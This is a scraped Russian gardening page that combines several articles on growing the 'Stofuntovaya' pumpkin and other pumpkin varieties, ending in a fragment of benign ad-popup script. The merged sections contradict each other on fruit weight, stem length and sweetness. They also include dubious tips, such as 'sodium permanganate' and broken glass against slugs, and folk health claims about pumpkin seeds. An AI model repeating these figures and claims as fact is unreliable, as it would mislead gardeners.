0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сортовая характеристика стофунтовой тыквы

Выращивание тыквы Стофунтовая

В арсенале каждой хозяйки есть вкусные тыквенные блюда. И это не удивительно, ведь эти овощи являются незаменимым источником витаминов в холодное время года. Среди наиболее интересных сортов первое место занимает тыква Стофунтовая. Она считается одним из самых распространенных видов среди овощеводов на протяжении нескольких десятков лет.

Выращивание тыквы Стофунтовая

Характеристика сорта

Стофунтовая тыква недаром получила такое название: известны случаи, когда вес плодов составлял от 90 до 170 кг. В целом сорт отличается высокой урожайностью (примерно 3-6 кг/м²) и средними сроками созревания. Согласно описанию, урожай можно собирать уже через 110-140 дней.

Главной отличительной чертой сорта Стофунтовая является большое семенное гнездо.

Плоды крупноплодной тыквы обычно слабо сегментированные, а зачастую просто гладкие, шаровидные или овальные, оранжевого цвета. Иногда встречаются экземпляры серого или серо-зеленого оттенка. Мякоть рыхлая с невысоким содержанием сахара. Сорт обладает хорошей лежкостью, этот крупноплодный овощ довольно холодостойкий и может храниться до 9 месяцев.

Выращивание и уход

Садить тыкву следует на светлое место

Эта тыква – светолюбивое растение, которое плохо переносит недостаток света. Если тыкве его мало – урожай резко снижается. Кроме того, из-за большой листовой поверхности овощу необходим хороший полив. Но здесь нужно быть осторожными, поскольку лишняя влага негативно влияет на растение.

Еще одной особенностью сорта считается высокая потребность в органических удобрениях, поэтому иногда тыквы высаживают на площадках для хранения навоза или компостных кучах. Именно в таких местах почва обладает достаточным количеством микроэлементов.

Чтобы защитить плоды от слизней, можно подкладывать под них фанеру или доски. Некоторые источники рекомендуют подбрасывать битое стекло, но делать это нужно с осторожностью, чтобы не пораниться.

Удобрения

Лучшими удобрениями для тыквы сорта Стофунтовая являются:

Лучше вносить подкормки на глубину 10-20 см. В целях экономии удобрения можно добавлять по 1 кг непосредственно при посадке в лунку. Если почва глинистая, ее предварительно насыщают азотом, а в лунку засыпают полведра опилок.

Средней дозой удобрений, необходимой для тыквы, считается 4-6 кг компоста, 120 г золы. Подпитку рекомендуют вносить за 2 недели до посадки.

Посадка

Для начала выбирают наиболее крупные семена и проращивают их в опилках. Некоторые овощеводы рекомендуют предварительно замачивать их в растворе золы (1 ч. л. на 1 л воды). Кроме того, можно использовать для этих целей раствор нитрофоски, кристаллина или даже марганцовки.

Семена в открытый грунт помещают на глубину в 5-10 см, когда почва прогреется примерно до 12 °С.

Сбор урожая

Крупноплодную тыкву собирают, когда плодоножка усыхает. Плоды обязательно нужно убирать в сухую погоду и до наступления заморозков. Обычно тыквы срезают вместе с плодоножкой и просушивают еще дней 10, чтобы кора затвердела и ушла лишняя влага.

Если погода позволяет, просушивать овощи можно на улице. Сразу после сбора тыкву не едят, ведь со временем плод становится еще слаще. Витамины сохраняются в ней и в холодное время года.

Сортовая характеристика Стофунтовой тыквы

Культура среднего срока созревания – тыква Стофунтовая – является одной из самых популярных среди огородников. Она известна крупным размером плодов и неприхотливостью в уходе. В отличие от других сортов гниение происходит редко. Отличается огородная культура высокой урожайностью и отменными вкусовыми качествами спелого продукта.

Сортовая характеристика Стофунтовой тыквы

Описание сорта

Высокая стойкость к заболеваниям делает эту тыкву универсальной и востребованной. Сорт отличается большой урожайностью: с одного квадратного метра удастся собрать до 6 кг продукта. Отличается он и повышенной лежкостью.

Сорт дозревает на открытом грунте или в прохладном помещении. Хорошо хранится целый плод, и его можно использовать до весны.

В общих чертах сорт характеризуют:

  • высокая транспортабельность – благодаря этому культура часто выращивается на продажу;
  • большое содержание сахара в плодах , что обеспечивает им приятный вкус;
  • частое использование в кулинарии: вкусный продукт применяют для приготовления различных блюд – его можно употреблять в сыром, вареном или запеченном виде;
  • твердая кожура.

Признаки куста

Окрас листвы – зеленый с небольшими прожилками. Поверхность неравномерная, негладкая. Листва широкая. Описание плодоножки: среднего размера и твердая. Отличается культура большим семенным гнездом. Вокруг него завиваются длинные и в меру тонкие плети.

Отличается куст быстрым ростом: боковые стебли разрастаются по сторонам до метра.

По этой причине выращивание тыквы Стофунтового сорта сопряжено с рядом трудностей, например, нельзя делать слишком густые насаждения.

Характеристика овоща

Сорт отличается большим размером культуры. Эта тыква не просто крупноплодная – если за ней правильно ухаживать, на кусте появляется сразу 2-3 плода-гиганта.

Сегментирование овощей слабое, почти незаметное. Встречаются совсем гладкие плоды сорта. У них шаровидная форма и большой размер. Чем крупнее плод, тем ярче его окрас. Самые большие овощи имеют ярко-оранжевый цвет. Плоды с серой или зеленой кожурой встречаются реже: это маленькие и незрелые овощи.

Условия выращивания определяют вкусовые качества продукта. Описание мякоти: цвет бело-желтый, структура рыхлая. Чем плотнее мякоть, тем нейтральнее вкус. Сочные и сладкие только оранжевые овощи. Они выращиваются с хорошим поливом и удобрениями.

Выращивание овоща

Нельзя высаживать тыкву в низинах или на участках, которые часто затапливаются. К соседству культура неприхотлива – она хорошо уживается с кукурузой и тыквенными растениями. Высокая биологическая активность продукта обусловлена способом его рассадки: мякоть формируется из рассохшихся плацент.

Тыква крупноплодная Стофунтовая нуждается в большом количестве солнца. Лучше выбирать для его выращивания хорошо освещаемые участки.

Высаживается сорт только весной. Выбирают период, когда исключаются заморозки – резкого похолодания культура не переживет.

Растению необходимо хорошее освещение

Посадка рассчитывается из периода вегетации, который наступает в середине осени: лучше собирать урожай в сентябре. Чем позднее посев, тем менее вкусной получается мякоть.

Густота посева определяет размер будущих плодов. Стандартная схема: 140 см в длину и в ширину. Чем больше расстояние между семенами, тем больше места окажется для роста овоща: сорт быстро разрастается, поэтому экономить на свободном пространстве нельзя.

Посадка семян

Крупноплодная тыква высаживается из семян. Они хранятся в сухом и теплом помещении. Используются те из них, которым не меньше 2-3 лет. В одну лунку помещают по 2-3 семени. Первые всходы появляются спустя 5 дней.

После этого одно или два лишних растения срезается – они только помешают в росте основного куста. Вырывать с корнем лишний побег нельзя, потому что можно повредить главное корневище. Сразу после посева рассада поливается, а следующее орошение происходит не раньше чем через неделю.

Уход за растением

Уход зависит от состава почвы. Если она отличается повышенной плотностью, верхний почвенный слой периодически разрыхляется. Перед посадкой из земли убирают все старые корешки и сорняки. Чем чище будет почва, тем быстрее прорастет культура.

В обязательном порядке вносятся удобрения. Первый слой закладывается до высадки, второй – спустя 2-3 недели после этого. Используются органические и минеральные подпитки.

Лучше вносить органику в осенний период как основной уход. Навоз благоприятно влияет на качество стеблей и укрепляет корневую систему. Заменители навоза – это компост, перегной и зола.

Полив

Уход за тыквой-гигантом проводится с поливом. Даже в регионах с частыми дождями созревающие плоды нуждаются в дополнительной подпитке. Поливают овощ редко, но обильно – используют не меньше 2 ведер за один раз.

Выливают жидкость под корень. В период опыления нельзя допускать попадания чрезмерного количества влаги на завязи. Созревшие плоды лучше лишний раз не орошать. Они самостоятельно наберутся питательных веществ с корневой системы.

Если не прекращать поливные работы до сбора урожая, мякоть будет водянистой и невкусной. Самый оптимальный вариант – полив во время активного роста куста.

Тыква крупноплодная ‘Стофунтовая’

Латинское название: cucurbita maxima ‘stofuntovaya’

Основной вид : Тыква крупноплодная
Урожайность
  • высокая
Срок созревания
  • среднепоздний
Тип почвы
  • супесчаная
  • суглинки/глина
Способ выращивания
  • открытый грунт
Назначение плодов
  • консервирование и переработка
Устойчивость к болезням
  • средняя
Требования к ph почвы
  • нейтральная (ph 6.5-7)
Жизненная форма
  • однолетник
Форма плодов/стеблеплодов/корне- и клубнеплодов/кочанов
  • овальная
  • округлая
Размер плодов/стеблеплодов/корне- и клубнеплодов/кочанов
  • очень крупные
Регион возделывания по оригинатору
  • Волго-Вятский регион
  • Северо-Кавказский регион
  • Средневолжский регион
Витаминность
  • высокая
Цвет плодов/корне- и клубнеплодов
    Цвет листьев/стеблеплодов/кочанов
      Цвет мякоти плодов/корне- и клубнеплодов
        Толщина корки
        • тонкая/мягкая
        Устойчивость к заморозкам
        • Не указано
        Засухоустойчивость
        • Не указано
        Декоративная ценность
        • Не применимо
        Вкус плодов
        • сладковатый
        Укрытие на зиму
        • Не применимо
        Устойчивость к вредителям
        • Не указано
        Габитус
        • рослый/раскидистый
        Лежкость
        • Не указано
        Партенокарпический
        • Не применимо
        Характер ветвления
        • Не указано
        Плотность и характер мякоти
        • Рыхлая

        Развернуть все свойства

        Описание растения:

        Тыква крупноплодная ‘Стофунтовая’ — сорт народной селекции. Разрешен к использованию по Волго-Вятскому, Северо-Кавказскому и Средневолжскому регионам в 1947 году.

        Размер и форма роста:

        Сорт ‘Стофунтовая’ представлен средней мощности растениями с длинными плетями. Главный стебель до 700 см. Лист почковидной формы. Черешок длиной до 40 см.

        Тыквина:

        Размер, форма и цвет:

        Тыквина шаровидной или короткоовальной формы. Поверхность гладкая или слегка сегментированная, бугристая. Масса плода 10–20 кг. и более. Окраска розовая, желтая, оранжевая и серая. Кора тонкая, гибкая. Мякоть кремовая и желтая, рыхлая, толщиной 4–5 см.

        Семенное гнездо большое, плаценты средней плотности.

        Плоды обладают удовлетворительным, слегка сладким вкусом.

        Сроки созревания и урожайность:

        Тыква крупноплодная ‘Стофунтовая’ относится к среднепоздним сортам. Период от полных всходов до сбора плодов 112–138 дней. Урожайность 3.2–6.3 кг/м 2 .

        Устойчивость к болезням:

        Сорт относительно устойчив к гнилям плодов, мучнистой росе и бактериозу.

        Способы применения:

        Рекомендуется для использования в кормовых целях.

        Тыква: описание 30 лучших сортов. Общие сведения и классификация, сорта для разных регионов России | (Фото & Видео) +Отзывы

        Тыква: описание 30 лучших сортов

        Предлагаем Вам ознакомимся с описанием наиболее популярных сортов тыквы. Наверное, нет в России дачных участков, где бы ни росла тыква. Её история насчитывает множество веков. Известно, что тыкву использовали ещё жители племени майя, зная о её целебных свойствах. Этот овощ имеет большое преимущество среди всех остальных – его можно долго хранить, а в пищу можно употреблять не только сочную мякоть, но и полезнейшее семя.

        Содержание:

        Общие сведения и классификация

        Семейство тыквенные включает в себя 27 видов. Из каждого выведено огромное количество сортов.

        В нашей стране чаще всего выращивают 3 вида тыквы:

        • К твёрдокорым видам (обыкновенная тыква) относятся овощи с толстой, деревянистой кожурой. Они, обычно, созревают раньше всех – в конце лета, начале осени.
        • Мускатные тыквы любят тепло, поэтому лучше всего плодоносят на территориях с тёплым климатом. Вегетационный период у них длинный, чаще всего, в нашей стране их нужно высаживать на рассаду.
        • Крупноплодные тыквенные образуют самые большие, сладкие плоды. Они лучше всего подходят для долгого хранения, выращивания в холодных частях страны.
        • Существует сорт томатов под названием фиолетовая тыква.

        По назначению тыквы делятся на:

        • столовые сорта
        • кормовые
        • декоративные

        Опишем различные сорта для выращивания в различных регионах России, вкусу и т.д.

        Мускатная тыква

        • Мускатная тыква одна из самых любимых представителей семейства тыквенных среди дачников. Она родом из Мексики. Получила своё название за тонкий мускатный аромат.
        • Её популярность связана со вкусовыми качествами, насыщенным цветом мякоти, долгим сроком хранения. Поэтому мускатную тыкву ещё называют зимней. После долгой лёжки её мякоть приобретает более насыщенный цвет. Но не рекомендуется хранить овощи более полугода.
        • Этот вид включает в себя множество сортов. Все они имеют различную форму и цвет. У большинства разновидностей плоды удлинённой формы – грушевидной, овальной, цилиндрической.
        • Отличительным признаком этой группы растений является пятигранная плодоножка тыковки. Но у всех представителей тонкая кожура, которая легко очищается.
        • Мускатная тыква лучше всего подходит для выращивания в южных регионах страны. В средней полосе России можно сажать её с помощью рассады или в парниках, теплицах.
        • Почти все сорта с поздним сроком созревания.

        Испанская гитара

        • Растение получило название за необычную форму плодов, весом до 8 кг. Длина овощей зависит от плодородия почвы и колеблется в пределах 70-100 см, диаметр – около 17 см.
        • Это среднеспелый сорт, который обладает хорошей лёжкостью и по вкусу напоминает абрикосы. Семян в плотной мякоти мало, расположены они только в утолщённой части овоща.
        • Тонкая кожура, внутренняя часть тыквины оранжевого цвета. На поверхности плода нет ребёр.
        • Сорт подходит для употребления в сыром виде, но пока не получил широко распространения в нашей стране.

        Цукатная

        • Первый урожай цукатной тыквы собирают через 4-5 месяцев после появления ростков. Сорт относиться к среднепоздним.
        • Плоды светло-коричневого цвета округло-приплюснутой формы. После созревания их средний вес – 5 кг. Внутренняя часть сахаристая, хрустящая, оранжевого цвета.
        • Цукатную тыкву широко используют для изготовления кондитерских изделий, лечебного, детского питания.
        • Собранный урожай можно перевозить, хранить длительное время.

        Витаминная

        • Поздний сорт мускатной тыквы, плоды которой полностью созревают не менее, чем через 3,5 месяца после появления первых всходов. Одно растение, обычно, образует 2-3 плода.
        • Овальные ребристые тыквины, весом до 5 кг. Кожура тонкая, оранжевого цвета. Мякоть сочно оранжевого цвета, плотная и хрустящая. На вкус сладкая. Широко используется для изготовления сока, кондитерских изделий, а также подходят для употребления в свежем виде.
        • Плоды можно хранить, но небольшой промежуток времени.

        Мраморная

        • Сорт со средним сроком созревания плодов, предназначенный для посадки в тёплых регионах России. В среднем, первый урожай собирают через 4 месяца и 10 дней после появления первых ростков.
        • Кусты образуют зелёно-серые тыквины сплюснутой округлой формы, массой 6-10 кг. Их мякоть рыхлая, оранжевого цвета, приятная на вкус. Кожура после созревания приобретает зелёный, серый цвет.
        • Сорт подходит для транспортировки на длительные расстояния. Плоды не трескаются и не гниют.
        • При низких температурах воздуха тыквины можно хранить в течение продолжительного времени – около 1 года.

        Мускат де прованс

        Мускат де прованс

        • Выведен Французскими селекционерами.
        • Первыми плодами «муската де прованс» можно насладиться через 110 дней после появления всходов.
        • Они имеют округлую, приплюснутую форму, набирают массу не более 4 кг.
        • Плод снаружи оранжевого цвета с множеством ребёр.
        • Внутри тыквина оранжевого цвета, плотной консистенции, сладкая и сочная.
        • Овощи можно собрать ещё до полного созревания и долго хранить при температуре 8-10 C.

        Ореховая

        • Растение имеет ещё одно не менее известное название – баттернат, или мосхата. Она была получена израильскими учёными, путём скрещивания африканской и разновидности мускатной тыквы.
        • Одна из немногочисленных представительниц группы, которая поспевает через 3-3,5 месяца.
        • Растение лучше всего плодоносит, когда на одном кусте оставляют не больше 5 плодов, которые при созревании весят 1-1,2 кг.
        • Сам овощ имеет удлинённую форму и по виду напоминает кабачок. Цвет плотной кожуры и мякоти жёлтый. Плод внутри волокнистый, сочный, с лёгким ореховым ароматом и небольшим количеством семян.
        • У растения есть один минус – для получения вкусных, ароматных плодов ей требуется должный уход.
        • Баттернат можно срывать ещё до полного созревания. Овощи дозревают и вне куста, что позволяет дольше хранить их. Обычно их срывают в конце лета, начале осени, если есть риск похолодания.
        • Плоды можно использовать как для приготовления различных сладких блюд, так и добавлять к мясу. Любители сырых овощей могут использовать её в необработанном виде.

        Сорта с крупными плодами

        • Дачники не очень любят сорта, которые образуют большие тыквины, так как за один раз овощ не съешь, а хранить его в городской квартире крайне неудобно.
        • Крупноплодная тыква включает в себя около 100 сортов.

        Тыква фонарь

        • Относится к разновидности крупноплодной тыквы. Для созревания плодов необходимо 3-3,5 месяца.
        • Снаружи они гладкие, оранжево — розового цвета, слаборебристые.
        • Форма округлая, чуть вытянутая.
        • Каждый экземпляр весит 5-6 кг. Внутренняя часть нежная жёлто-оранжевого цвета, хрустящая, сочная.
        • Сорванная тыковка может храниться 3-3,5 месяцев. Сорт подходит для перевозки.
        • Собранный урожай подвергают термической обработке. Используют для изготовления соков, пюре.
        • Растение относится к теплолюбивым, засухоустойчивым. Посадки может поражать мучнистоя роса, бактериоз.

        Русская каша

        • Относится к крупноплодной разновидности. Для получения первых плодов может понадобиться до 4 месяцев.
        • Сорт считается среднеспелым. Один куст образует 3-4 тыквины, массой 6-7 кг оранжево-розового цвета.
        • Форма их округлая, с малозаметной ребристостью.
        • Внутренняя часть средней плотности, окрашена в оранжевый цвет. Вкусовые качества хорошие.
        • Плоды можно хранить.
        • По названию уже можно предположить, что сорт отлично подходит для тушения, запекания, варки.
        • Также можно использовать для консервирования, употреблять в необработанном виде.

        Разновидности твёрдокорой тыквы

        К этой же группе относятся и кабачки, патиссоны

        • Эту разновидность чаще всего можно встретить на Российских участках.
        • Твёрдокорым сортам свойственен длинный стебель растений – до 7 м. Их ещё называют столовыми.
        • Но существуют и растения с короткими стеблями.

        Плюшка

        • Ранний сорт. Для получения первых тыквин необходимо около 3 месяцев.
        • Плоды небольшие – 1,5 кг, окрашены в оранжевый цвет. Белые полосы разделяют его на сегменты.
        • Внутренняя часть сахаристая, сочная, оранжевого цвета.
        • Сорт подходит для хранения. Собранный урожай можно употреблять в свежем виде, использовать для изготовления соков, диетических блюд и т.д.

        Голосеменная

        • Голосемянной тыквой называют группу растений, у которых семена не покрыты твёрдой оболочкой. Данная разновидность была известна ещё в начале XX века, но в нынешнее время снова начала набирать популярность.
        • Внешне плоды не отличаются особой привлекательностью – зелёно – жёлтого цвета. Снаружи покрыты плотной, твёрдой, но тонкой кожурой. По форме округлые, с малозаметной ребристостью, массой 3-7 кг.
        • Первый урожай собирают через 4 месяца после появления всходов. Срок хранения плодов длиться около 2 месяцев.
        • Мякоть используют как в необработанном виде, так и для приготовления различных блюд, а также в косметологии, медицине. Некоторые источники утверждают, что лучше всего использовать тыквины через несколько недель после сбора. К этому моменту они раскрывают весь свой вкус.
        • Чаще всего, этот сорт выращивают именно для семян. Представителей голосеменных овощей рекомендуют сажать подальше от других тыквенных, так как они могут перекрёстно опыляться. В этом случае, семя уже будет с плотной оболочкой.

        Наиболее известные сорта голосеменной тыквы:

        Полный обзор тыквы Стофунтовая: характеристики, посадка и уход

        Название культуры – Стофунтовая тыква – говорит само за себя, так как плоды отличаются повышенной крупностью. Сорт устойчив ко многим заболеваниям, имеет высокую урожайность, привлекательный внешний вид, отличную лежкость и вкусную мякоть. Считается наиболее распространенным растением на территории России.

        Описание сорта

        Тыква Стофунтовая занесена в Госреестр в далеком 47-ом году прошлого века, предназначается для взращивания в центральных регионах РФ, относится к сортовой тыкве, благодаря чему существует возможность использования семечек в качестве посадочного материала (гибридные селекционные сорта нельзя высаживать из внутренних семян).

        Культура относится к среднеспелой, так как созревает через 115-140 дней после высаживания в открытый грунт. Урожайность высокая – с 1 кв. м можно взять до 3-х крупных тыкв. Лучшие погодные условия – умеренно-теплые.

        Характеристика куста:

        1. Листья – широкие, крупные. Цвет – зеленый, прожилки – светло-зеленые. Поверхность – неравномерная, шероховатая.
        2. Плодоножка – достаточно жесткая, размер – средний.
        3. Семенное гнездо – крупное, главный стебель имеет длину 70 см.
        4. Боковые побеги – вьющиеся и тонкие, более одного метра.
        5. Главное корневище внедряется в глубокие слои почвы, дополнительные корешки располагаются у поверхности грунта.

        Характеристика плодов:

        1. Размер – довольно крупный, весом от 10-ти до 60-ти кг, соответственно, при надлежащем уходе и климате. Чаще всего встречается масса в 15-20 кг.
        2. Кожура – упругая, но тонкая. Цвет варьируется – светло- и ярко-оранжевый, серый, желтый, зелено-желтый. Оттенок зависит от региона произрастания, качества ухода, погодных условий, размера плодов (самые яркие – крупные).
        3. Форма – шарообразная, овальная, слегка приплюснутая у основания.
        4. Ребристость – слабовыраженная.
        5. Мякоть – сочная и рыхлая, толщиной до 6-ти см (в среднем). Цвет – насыщенно-оранжевый, имеет много семян. Сладость мякоти – умеренная.

        Если правильно ухаживать за культурой, то плоды вырастают крупные и сладкие. Этот же фактор влияет на урожайность – один куст может содержать до 3-х тыкв.

        Среди преимуществ следует отметить следующее:

        • устойчивость ко многим болезням;
        • универсальность использования;
        • сорт, проверенный временем и многолетним опытом;
        • большая урожайность;
        • хорошая лежкость;
        • транспортабельность;
        • возможность дозревания в прохладном помещении или на солнце;
        • длительность хранения;
        • использование семечек для посадки.

        Сферы применения:

        • приготовление вторых блюд – салаты, запеканки, каши и т. д.;
        • десерты;
        • супы-пюре;
        • корм для животных;
        • соки.

        В пищу используются и семена, которые отличаются отменными вкусовыми качествами и крупностью. Именно Стофунтовая тыква рекомендована медициной для применения при наличии гельминтов, так как семечки обладают глистогонным действием.

        Кроме того, народная медицина советует использовать тыкву (мякоть и семя) при снижении остроты зрения, нарушенном метаболизме, низком иммунитете. Состав тыквенной культуры способствует нормализации функциональности печени и выведению из организма токсинов и прочих вредных веществ.

        Как выращивать сорт?

        Чтобы получить богатый и вкусный урожай, необходимо следовать основным агротехническим требованиям. Технология выращивания основана на таких показателях:

        1. Стофунтовая тыква не любит повышенную влажность. Поэтому не высаживается в низине и при близком расположении грунтовых вод к поверхности земли.
        2. Севооборот. Сорт неприхотлив в отличие от своих сородичей. Лучшими соседями считаются тыквенные культуры и кукуруза. Высаживать желательно после томатов и любых корнеплодов. Нежелательно использовать участок после арбузов и дынь, огурцов и капусты.
        3. Участок должен хорошо освещаться, благодаря чему плоды набирают яркость цвета.
        4. Время посадки – преимущественно весна, когда земля прогревается до 15-ти градусов. Раньше высаживать запрещено, так как сорт неустойчив к холодам. Но и слишком поздно сажать овощ не рекомендуется, потому, что мякоть не наберет сочность, вкус.
        5. Тыква Стофунтовая быстро разрастается, плоды крупные, поэтому нужно много свободного пространства. Следовательно, высаживать посадочный материал желательно по схеме 140х140 см.
        6. Почва должна быть обогащенной и рыхлой. Если грунт не плодородный, его удобряют при перекопке огорода осенью. Для этого используется органика – перегной или навозная жижа. Для 1 кв. м необходимо 5-8 кг удобрения. При повышенной кислотности земли вносится известь, торф и древесная зола. Для облегчения почвы подмешивается песок.

        Подготовка семян

        Стофунтовую тыквенную культуру можно высаживать 2-мя способами – рассадным и безрассадным. Независимо от этого требуется специальная подготовка семян, что обеспечит быстрый рост растения и хороший урожай.

        Правила подготовки семенного материала:

        1. Изначально семена пересматриваются вручную – отбирают неповрежденные элементы. Их поверхность должна быть гладкой, без пятен и трещин. Структура – плотная.
        2. После этого можно (но не обязательно) положить зерна в воду на 15-20 минут. Пустотелые семена поднимутся вверх, полные окажутся внизу ёмкости.
        3. Теперь нужно прогреть семенной материал. Для этого берут кусок марли, сворачивают его в несколько слоев. Внутрь укладывают семена и размещают их на солнце (можно использовать отопительный радиатор). Существует и более быстрый метод прогрева – в духовом шкафу. Действовать надо по схеме: на 1 час уложить семена при температуре +20 градусов, на второй час – 30, на третий – 40, на четвертый – 50, на пятый – 60 градусов.
        4. Обязательно проводится дезинфекция для предупреждения возникновения болезней. Семена помещаются в слабый раствор марганцовки на 15-20 минут.
        5. Для ускорения процесса прорастания можно использовать стимуляторы роста, купленные в специализированном магазине. Простимулировать рост можно и народными средствами. Для этого взять 200 мл воды и 1 ст. л. древесной золы, уложить семенной материал. Оставить на 12 часов. Температура раствора не должна быть ниже +40 градусов.
        6. Чтобы тыква легче адаптировалась к уличным условиям, можно провести процедуру закаливания. Для этого замочить семена в увлажненной ткани, уложить их в холодильник на двое суток.

        Посадка рассадным методом

        Рассадный метод высадки тыквы Стофунтовой применяется в северных регионах. Для семян подбирается почва легкая и питательная. Опытные огородники рекомендуют использовать универсальные магазинные субстраты. Если такой возможности нет, можно в равном соотношении смешать песок, перегной и чернозем. В этом случае требуется дезинфекция почвы раствором перманганата натрия, но концентрация его должна быть больше, чем при дезинфекции семян.

        Пикирование тыква не переносит, так как корневая система нежная. Чтобы исключить повреждение корней, семена укладываются в индивидуальные стаканчики или горшки (лучше купить торфяные).

        Правила посадки семенного материала и рассады:

        1. На днище ёмкости уложить керамзитовые камешки для дренажной системы, заполнить подготовленной почвой, увлажнить пульверизатором.
        2. Уложить в каждый горшок по 2 зерна на глубину 3 см, после чего слегка оросить водой.
        3. Стаканы накрыть пленкой, поставить на подоконник с солнечной стороны.
        4. Когда появятся ростки, пленку снять.
        5. При появлении 2-х полноценных листков один всход удаляют путем прищипывания.

        Основные требования по выращиванию рассады:

        • полив осуществлять ежедневно, но почва не должна быть чрезмерно мокрой;
        • световой день для Стофунтовой тыквы – 15-16 часов, поэтому в темное время суток необходимы лампы (предпочтение отдайте люминесцентным);
        • за 7-8 дней до высадки произведите подкормку (воды – 10 частей, куриный помет – 1 часть);
        • за 15 суток до пикировки необходимо выносить рассаду на свежий воздух (открыть окно, поставить на улицу/балкон).

        Посадка семян в грунт

        Сразу в огород семена высаживаются в теплых регионах страны. Температура почвы должна составлять +15 градусов (измерить можно термометром, опустив его на глубину штыка лопаты). Чаще всего это первые числа мая.

        Правила посадки:

        1. Разбить лунки на расстоянии друг от друга 140х140 см, уложить удобрение и семена, засыпать почвой, полить водой.
        2. Глубина закладки – от 6-ти до 10-ти см.
        3. Ширина лунки – 25 см.
        4. Примерно через 5-6 дней появляются первые всходы. Если взошло одновременно два семени, то более слабое удаляют путем срезания.
        5. Второй полив проводится через неделю после закладки семенного материала.

        Правила ухода

        Стофунтовая тыква – неприхотлива в уходе, но это зависит от климатических условий и структуры почвы. Если грунт тяжелый, приходится часто его рыхлить. При неплодородной почве производится подкормка.

        Обязательное требование – полив. Орошение осуществляют минимум дважды в неделю, вливая 2-5 литров теплой воды. Запрещено орошать листву и стебли – только прикорневую зону. Примерно за 2-3 недели до сбора урожая поливку прекращают. В противном случае плоды будут слишком водянистыми.

        Подкормки

        Подкормка удобрениями всегда ускоряет рост и повышает урожайность, поэтому не стоит пренебрегать данной процедурой. Первое внесение осуществляется через 30 суток после посадки. Далее подкармливание проводят через каждые 14-15 дней. Что используется:

        1. Первый раз – нитрофоска. На один куст достаточно 10 грамм.
        2. Второй раз – коровяк. На ведро воды необходим 1 литр навоза. На один куст достаточно влить 800-1 000 мл.
        3. Третий раз – магазинные удобрения на основе калия и фосфора (пропорции прописаны в инструкции).
        4. После образования соцветий под корни льют раствор из древесной золы и воды. На один куст нужен литр воды и 1 ст. л. природного компонента.

        Борьба с болезнями и вредителями

        Иммунная система Стофунтовой тыквы относится к средней по отношению к бахчевым заболеваниям. Чем может заболеть растение:

        1. Бактериоз поражает тыквы и листьевую часть, образуя темные пятна. Для лечения используется стандартная бордосская жидкость.
        2. Роса мучнистая высушивает и уничтожает наземную часть растения после образования белесых пятен. Для терапии проводится опрыскивание раствором из двузамещенного фосфорнокислого натрия, смешанного с водой (50 грамм на ведро).
        3. Клещ паутинный покрывает паутиной всё растение. Целесообразно опрыскивание настойкой из луковой шелухи (сварить 1 кг шелухи в 10-ти литрах воды).
        4. Тля. Признаки – наличие насекомых, скручивание и пересыхание листьев. Методы борьбы – опрыскивание препаратом на основе карбофоса или мыльным раствором.

        Особенность Стофунтовой тыквы заключается в повышенной устойчивости к заболеваниям гнилостного характера. Если говорить простыми словами, то никакая гниль (черная, серая, корневая, белая) сорту не страшна, если не заливать растение преднамеренно много.

        Какие трудности могут возникнуть?

        Возможные сложности и полезные советы огородников:

        1. Если растение подвергается пожелтению листьев, причину нужно искать в отсутствии питательных веществ почвы. Такая проблема может возникать и при чрезмерно большом количестве плодов (не хватает влаги и полезных веществ листьям).
        2. Если желтеет наземная часть растения, значит, недостаточно света.
        3. Если семена не прорастают, то посадочному материалу не хватает тепла (вода или грунт недостаточной температуры).
        4. Истонченность и вялость стеблей возникает по причине бедности грунта.
        5. Корни гниют на фоне повреждений. Такое происходит чаще всего после вырывания вместе с корневой системой одного из всходов. Решение – слабый росток срезают у поверхности земли.
        6. Малое количество завязей – нет опыления при недостаточном количестве необходимых насекомых. В этом случае проводят искусственное опыление. Для этого срезают и раскрывают мужские цветки, прикладывают тычинками к женским рыльцам.
        7. Нет всходов при посеве в открытом грунте – семена перемерзают. Выход – накрывать лунки пленкой, пластиковыми бутылками или перегноем.

        Как собирать и хранить урожай?

        Сбор осуществляют на протяжении сентября, хотя чаще всего тыквы созревают уже в августе. Дело в том, что данный сорт чем дольше «греется» на солнце, тем слаще становится.

        При сборе обязательно оставляют плодоножку. После срывания ставят для просушивания при комнатной температуре или на улице (должно быть солнечно) на 8-10 суток.

        Хранится тыква более полугода в прохладном и сухом помещении при температуре не выше +15 градусов и влажности воздуха 75-80%.

        Ссылка на основную публикацию
        Adblock
        detector
        ":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
        '+c+"
